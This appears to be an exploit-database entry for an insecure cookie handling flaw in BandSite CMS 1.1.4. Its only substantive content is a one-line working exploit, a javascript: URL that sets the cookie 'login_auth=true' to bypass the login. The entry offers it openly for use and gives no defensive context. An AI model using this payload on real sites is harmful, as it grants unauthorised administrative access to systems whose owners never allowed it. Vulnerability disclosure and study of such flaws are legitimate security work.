id: 4172
date: 11/13/2008
title: BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability
author: Stack
cves: 

=========================================================
BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability
=========================================================


###########################################################################
[+] BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability
[+] Discovered By Mountassif Moad                                 
[+] Greetz : All my Freind
###########################################################################
Exploit:
javascript:document.cookie = "login_auth=true; path=/";



#  0day.today [2023-03-24]  #